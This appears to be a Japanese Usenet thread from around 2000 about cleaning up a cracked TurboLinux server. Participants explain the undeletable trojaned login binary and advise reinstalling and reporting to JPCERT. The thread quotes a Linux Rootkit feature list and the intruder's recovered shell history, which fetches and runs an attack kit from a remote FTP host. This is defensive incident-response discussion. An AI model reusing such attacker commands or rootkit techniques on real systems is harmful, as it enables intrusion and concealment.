[Q]rm でファイルを消したいのですが・ ・・
くまきら~@電脳組
ハッカーにシステムをハッキングされてしまい、
loginコマンドが不正に変更されたので消そうとしましたが
何故か消せません。
root権限で消せないので親ディレクトリの名前をリネーム
(/bin/ -> /bin_hacked/)して、もともとの場所には正規
のloginコマンドを置いて窮地をしのぎました。
質問なのですが、そのファイルを消したいのですが、
rootでrmしても消えません。
===消えないファイル===
-r-sr-xr-x 1 root root 275676 Oct 29 1998 login*
===消えないファイルをrmした内容===
[root]# rm login
rm: remove `login', overriding mode 4555? y
rm: login: Operation not permitted
このような感じです。
どうやったらこの変なファイルを消去できるのでしょうか?
ご存知の方おりましたら、よろしくお願いします。
osはTurbo Linux 3.0(Kernel 2.0.36)です。
rmのバージョンは(GNU fileutils) 3.16です。
※ rmのバージョン(GNU fileutils) 4.0も試しましたがだめでした。
なお、正規のファイルは
rws--x--x 1 root root 19492 Jan 10 21:52 login*
これです。
よろしくお願いします。
---------
Akira Kumagai
a...@kira.to
http://www.kira.to
Yoichi NAKAYAMA
質問の答えではないのですが,
くまきら~@電脳組 wrote:
> ハッカーにシステムをハッキングされてしまい、
cracking ですよね?
> loginコマンドが不正に変更されたので消そうとしましたが
> 何故か消せません。
> root権限で消せないので親ディレクトリの名前をリネーム
> (/bin/ -> /bin_hacked/)して、もともとの場所には正規
> のloginコマンドを置いて窮地をしのぎました。
login コマンドが変更されたってのは root とられたってことです
よね?そこまでやられてたら,普通はシステムのインストールを
しなおすべきだと思いますが.
-------------------------------
Yoichi Nakayama E-ken NAGOYA
yoi...@eken.phys.nagoya-u.ac.jp
OZAKI Masanobu / 尾崎正伸
> login コマンドが変更されたってのは root とられたってことです
> よね?そこまでやられてたら,普通はシステムのインストールを
> しなおすべきだと思いますが.
加えて、再インストールの際は、是非ともセキュリティホールの
知られていない最新のバージョンでやって頂きたく思います。
TurboLinux なら 4.某 (4.2?) というのが出ているようです。
おざき@宇宙研
NOKUBI Takatsugu
a...@kira.to.NO-SPAMさんは書きました。
>> ===消えないファイルをrmした内容===
>> [root]# rm login
>> rm: remove `login', overriding mode 4555? y
>> rm: login: Operation not permitted
もしかしたら、immutable が指定されているのかもしれませんね。lsattr
するとどうなりますか?
とはいえ、他の方のフォローにもあるように 1 から install しなおすべき
だとは思います。
--
野首 貴嗣
E-mail: kn...@daionet.gr.jp (private)
nok...@eal.or.jp (official)
Takeshi Kusune
くまきら~@電脳組 <a...@kira.to.NO-SPAM> writes:
>> rootでrmしても消えません。
>>
>> ===消えないファイル===
>> -r-sr-xr-x 1 root root 275676 Oct 29 1998 login*
>>
>> ===消えないファイルをrmした内容===
>> [root]# rm login
>> rm: remove `login', overriding mode 4555? y
>> rm: login: Operation not permitted
file に i 属性がつけられていませんか?
$ lsattr /bin/login
して、属性一覧に `i' が含まれていないか確認してみて下さい。
# 属性については chaddr の online manual をどうぞ。
--
Takeshi Kusune <kus...@sfc.keio.ac.jp>
Masakazu Yamada
>>>>> くまきら~@電脳組 <a...@kira.to.NO-SPAM> wrote:
> ハッカーにシステムをハッキングされてしまい、
> loginコマンドが不正に変更されたので消そうとしましたが
> 何故か消せません。
まず、問題のマシンをネットワークから遮断します。次に、新しいディスクを
用意して、新規にシステムを再構築しましょう。クラックされたものは、その
ままいじらずに証拠保全した方が良いでしょう。
Linux Rootkitというのをインストールされているかも知れません。こんな内
容です。
This packages includes the following:
bindshell port/shell type daemon!
chfn Trojaned! User->r00t
chsh Trojaned! User->r00t
crontab Trojaned! Hidden Crontab Entries
du Trojaned! Hide files
find Trojaned! Hide files
fix File fixer!
ifconfig Trojaned! Hide sniffing
inetd Trojaned! Remote access
killall Trojaned! Wont kill hidden processes
linsniffer Packet sniffer!
login Trojaned! Remote access
ls Trojaned! Hide files
netstat Trojaned! Hide connections
passwd Trojaned! User->r00t
pidof Trojaned! Hide processes
ps Trojaned! Hide processes
rshd Trojaned! Remote access
sniffchk Program to check if sniffer is up and running
syslogd Trojaned! Hide logs
tcpd Trojaned! Hide connections, avoid denies
top Trojaned! Hide processes
wted wtmp/utmp editor!
z2 Zap2 utmp/wtmp/lastlog eraser!
こんなものをインストールされたら再構築するしか無いでしょう。
とりあえず、JPCERT http://www.jpcert.or.jp/ に報告しましょう。
--
masa...@yamada.gr.jp (Masakazu Yamada) 山田 雅一
くまきら~@電脳組
> $ lsattr /bin/login
>
> して、属性一覧に `i' が含まれていないか確認してみて下さい。
> # 属性については chaddr の online manual をどうぞ。
どうもありがとうございます。
あ、そのコマンド知りませんでした。
仕方が無いのでdebugfsコマンドで強制削除しました。
消す前に見ておくべきでした。
詳細は別の方へのレスに記述しますね。
--
くまきら~@電脳組
> まず、問題のマシンをネットワークから遮断します。次に、新しいディスクを
> 用意して、新規にシステムを再構築しましょう。クラックされたものは、その
> ままいじらずに証拠保全した方が良いでしょう。
通常は、直ぐにシャットダウンし、ネットワークから切り離すべきだと思います。
そして、再インストールするのが他のサーバーにご迷惑をかけないはずです。
おしゃることは正しいのですが、サーバーが私のところから実に600kmも
離れたところにあり、手におえないんですよ。
仕方が無いので、オリジナルのTurboLinuxをインストールしたマシーンを
用意して、md5sumで問題サーバーとの比較チェックしました。
チェックしたのは、ディレクトリのタイムスタンプが変更されている
ディレクトリのファイルを対象に行いました。
セキュリティ対策も行い、refused connectonしていることを確認しました。
それから、ハッキングとかきましたが、システムをいじられているので
クラッキングが正しいです。
そして、証拠保全は行いませんでしたが、作業内容を記録しているので
JPCERTに報告する予定です。
クラックされたことはすでにJPCERTに報告しています。
> Linux Rootkitというのをインストールされているかも知れません。こんな内
> 容です。
> This packages includes the following:
これは大変助かります、ありがとうございます。
こんなツール群があったなんてイヤですね(^^;
あとで再チェックしてみますが、私のところで検出できた
トロイの木馬と追加された変なポートは次のとおりです。
チェックはmd5sumでオリジナルと比較しました。
---追加変更されたファイル---
/etc/rc.sysinitでin.inetdを起動するように変更
/bin/loginを変更
/bin/lsを変更
/bin/netstatを変更
/bin/psを変更
/usr/sbin/dbmmanage*を変更
/usr/sbin/imapd*を変更
/usr/sbin/in.fingerd*を変更
/usr/sbin/in.ftpd*を変更
/usr/sbin/in.rshd*を変更
/usr/sbin/ipop2d*を変更
/usr/sbin/logcheck*を変更
/usr/sbin/logtail*を変更
/usr/sbin/named*を変更
/usr/sbin/gencustomlistを追加?(インストールした覚えが無い)
/usr/sbin/genhdlistを追加?(インストールした覚えが無い)
/usr/sbin/in.inetdを追加
/???/turbopkg???を追加(ファイル名忘れた)
/usr/src/Linux2.0.36???/以下のファイルを変更
---追加変更したファイル(ここまで)---
これらのファイルはオリジナルで上書きしました。
その後に、念の為にアップグレードしたファイルは次のとおりです。
Appach1.3.9 (apache-1.3.9-2.i386.rpm)
kernel 2.2.12(kernel-2.2.12-8.i386.rpm)
kernel 2.2.12(kernel-headers-2.2.12-8.i386.rpm)
kernel 2.2.12(kernel-ibcs-2.2.12-8.i386.rpm)
kernel 2.2.12(kernel-pcmcia-cs-2.2.12.3.0.14-8.i386.rpm)
kernel 2.2.12(kernel-source-2.2.12-8.i386.rpm)
fsck類(e2fsprogs-1.14-4.i386.rpm)
gnu file utilitys 4.0(fileutils-4.0-2.i386.rpm)
wu-ftpd-2.6.0(以前に自分がコンパイルしたやつをインストール)
私のところに残っているログで、浸入に使われたユーザーの
シェルヒストリーが残っていました。
こんな感じです。
この中のsvet*.tar.gzというアーカイブのセット内容が
かなり気になります。
--- user xxxxxで実行したコマンド ---
uname -a
ftp linux.tai.com.pl
gzip -d svet*
tar -xvf svet*
cd svet
./setup h1b4r1
./kaka
./b2
telnet localhost
ls
cd ..
rm -rf svet*
rm -rf rc
ls
w
uname -a
telnet irc.seed.net.tw 6666
nick macert
telnet irc.stealth.net 6667
telnet irc.webbernet.net 6667
ls
cat /etc/hosts
host -l kira.to
ls
w
exit
pico
chmod +x rc
./rc
--- user xxxxxで実行したコマンド(ここまで) ---
> こんなものをインストールされたら再構築するしか無いでしょう。
再インストールが一番楽なのですが、遠くにサーバーが設置されており、
サービスを停止できないんですよ。
凄く困ったのですが、結局は地道にファイルをチェックしています。
ところで、問題のlogin実行ファイルはdebugfsで消しました。
このコマンドに気がつくのに凄く時間がかかりました。
unixでは、たまに消えないファイルが出来るようなので
偶然消せなかったのかもしれません。
最後に、なぜクラッキングを受けたかを知ったきっかけは、
ハッカーのマヌケな行為で発見しました。
それは、私のサーバーのrootからハッカー宛てにシステムの内容を
返すメールを送ったようなのですが、unknown userで戻ってきたのです。
しかも、ハッカーがcronで実行したコマンドも失敗しています。
こういうレベルのハッカーなので、そんなに悪さしていないことを
願っています。
みなさんのご協力で不正アクセスされたサーバーも健全に
なりそうです。
なにか追加情報ありましたら、よろしくお願いします。
p.s.
システムを破壊するクラッキングはもう流行じゃないのでしょうかねぇ?
他のサーバーをクラックするための踏み台としてのクラックが流行り
なのかなぁ。
それから、不正アクセスは毎回違うアドレスから行われるのは
当然として、驚くことに.nec.co.jpからも不正アクセスと思われる
アクセスがあった点です。
いまだにアタックは続いています。
refused connectonなのに諦めが悪いみたいです。
くまきら~@電脳組
> 加えて、再インストールの際は、是非ともセキュリティホールの
> 知られていない最新のバージョンでやって頂きたく思います。
> TurboLinux なら 4.某 (4.2?) というのが出ているようです。
みなさん、ご親切にしていただいて、大変助かります。
そのとおり、TurboLinuxを使用しています。
インストールされているバージョンはTurboLinux3.0ですが、
個別にアップグレードしているので、セキュリティーホールは
殆ど無いはずでした。
ところが、一部忘れていたところがあって、浸入口はそこから
でした。pop2です。
TurboLinuxにもともとインストールされているimapd,ipop2d,
ipop3dを最新にしようと思い、いろいろと探したのですが、
ソースを発見できませんでした。rpmのパッケージも探しましたが
popやimapと名が付くものが無くてあきらめています。
もしかしたら、最新版が無いとか…。qpopperにしようかな(^^;
Yoichi NAKAYAMA
くまきら~@電脳組 wrote:
> 再インストールが一番楽なのですが、遠くにサーバーが設置されており、
> サービスを停止できないんですよ。
> 凄く困ったのですが、結局は地道にファイルをチェックしています。
楽というよりは,セキュリティ面からみても最善の対処だと思います.
root とられてるんですから,そのシステムを使ってチェックしても正しく
ない可能性があります.
# 物理的に無理だと言うているので,こんなん言うてもどないしょうもない
# のかもしれないですが.
# 人の居ないところにサーバがあるのかしら ;-)
> 最後に、なぜクラッキングを受けたかを知ったきっかけは、
> ハッカーのマヌケな行為で発見しました。
> それは、私のサーバーのrootからハッカー宛てにシステムの内容を
> 返すメールを送ったようなのですが、unknown userで戻ってきたのです。
> しかも、ハッカーがcronで実行したコマンドも失敗しています。
> こういうレベルのハッカーなので、そんなに悪さしていないことを
> 願っています。
そう思わせる様に log を書き換えられている可能性がありますね.
こういった場合は最悪の場合を想定して行動するのが管理者の心得だと思います.
> それから、ハッキングとかきましたが、システムをいじられているので
> クラッキングが正しいです。
# ×
UCHIDA Toshiaki
news:85l4lo$hqt$1...@news01de.so-net.ne.jp...
> TurboLinuxにもともとインストールされているimapd,ipop2d,
> ipop3dを最新にしようと思い、いろいろと探したのですが、
> ソースを発見できませんでした。rpmのパッケージも探しましたが
> popやimapと名が付くものが無くてあきらめています。
ん?
ftp://ftp.pht.co.jp/.2/turbolinuxj/updates/4.0/SRPM/imap-4.6-3.src.rpm
を rpm --rebuild すればよろしいんじゃないでしょうか?
ちなみに内田は自分で imap-4.7 + imap-4.7.lock-patch な package を作っ
て、RedHat 5.2 で運用しております。
--
内田 俊明 (UCHIDA,Toshiaki)
くまきら~@電脳組
> 楽というよりは,セキュリティ面からみても最善の対処だと思います.
> root とられてるんですから,そのシステムを使ってチェックしても正しく
> ない可能性があります.
ハッカーの操作内容から見て、その可能性はありませんというと、非難
ごうごうかな。あまいって言われるとおもいますが、私自身、あまくは
ありません。やるべきことはきちんとやっています。
システムを検査し、修復できるシステムか出来ないシステムか判断でき
るつもりです。
かなりの努力と苦労はしています。なにも苦労しないで言っている
訳ではありません。
不正ファイルの振る舞いも確認していますが、ここに掲載しないほうが
いいですよね。書くとおもしろ半分に侵入するひとが出てくると思うので。
再インストール無しに自立させるのはかなり酷な作業でした。
結局、全ディレクトリの再確認・再々確認し、おまけでカーネルも再イン
ストールしました。
また、md5sumとdiffが大活躍です。
ちなみに、チェックするのに手元のマシーンと問題マシーンの両方を使っています。
安全性の保障をする方法はこれしかありません。
はっきりいって苦肉の策としか言いようが無いです。手元にあれば、
すぐに再インストールしたいのは誰しも思っていることですが、
逆に何も考えずに再インストールするのは、浅はかな考えなのかもしれません。
ただし、数ヶ月後にシステムを一新する予定なので、時間はかかりますが
問題マシーンは世の中から消えます、ご安心ください。
> そう思わせる様に log を書き換えられている可能性がありますね.
> こういった場合は最悪の場合を想定して行動するのが管理者の心得だと思います.
logは改竄されているかもしれないので、あまり当てにはしていません。
とくに、あけられたポートからの侵入はログに残りません。
最悪の場合を想定して行動していますので、決して心得を忘れているわけでは
ありません。
> # ×
あんまりいじめないでくださいよ(^^;
じゃ、言葉を変えましょう。不正侵入、不正利用、不正改竄。
これでどうでしょうか?!(笑)
ところで、rootkitのソースをダウンロードしてきたのですが
これってrootのパスワードを忘れたときの緊急用に使えますね、
rootな方は早速インストールしておきましょう(大嘘)
という冗談はやめて、私のところにインストールされたものと
種類が違いますが、似た動作です。このソフト自体は脅威では
ありません。見えるものは脅威とは言いません。
見えないものが脅威といっておわかりでしょうか?
ところで、ハッカーはうちのサーバーから台湾のbbsにアクセス
した形跡が残っているので難しい漢字のわかる人々かも
しれません。ブラフだというのもありえますが。
私の手元にある情報では、30近くのサーバーが同じトロイの木馬を
仕掛けられています。
JPCERTには被害を受けたと思われるサーバー名を報告しました。
では。
くまきら~@電脳組
> ん?
> ftp://ftp.pht.co.jp/.2/turbolinuxj/updates/4.0/SRPM/imap-4.6-3.src.rpm
> を rpm --rebuild すればよろしいんじゃないでしょうか?
あれ?
そんなところにありましたか(^^;
大変失礼しました。
linuxってべんりですよね。SRPMやRPMがあるので、昔やっていたような
ことをいちいちやらなくて済みますから。
昔はコンパイルしてインストールしたものです。
早速インストールしたいと思います。
> というか、hack にはシステム侵入という意味はなく、本来の用法は
> 今日は kernel hack して fs まわりをかっこよくしたよ
> とかいう感じですから。
なるほどありがとうございます。
私の持っている辞書はとても古いようです。
UCHIDA Toshiaki
> linuxってべんりですよね。SRPMやRPMがあるので、昔やっていたような
> ことをいちいちやらなくて済みますから。
FreeBSD でも NetBSD でもそうですね。
> 昔はコンパイルしてインストールしたものです。
今は package を作る手間が増えた分面倒になったという人もいますけど:-)
とはいえ、削除や upgrade の時には package 化しておいたほうが便利ですし、
複数人が管理となると、package 化は必須ですね。
> > というか、hack にはシステム侵入という意味はなく、本来の用法は
> > 今日は kernel hack して fs まわりをかっこよくしたよ
> > とかいう感じですから。
>
> なるほどありがとうございます。
> 私の持っている辞書はとても古いようです。
いや、hack のもとからの意味がこうですから、その辞書は古いのではなくもと
から間違っていたのでしょう。
--
内田 俊明 (UCHIDA,Toshiaki)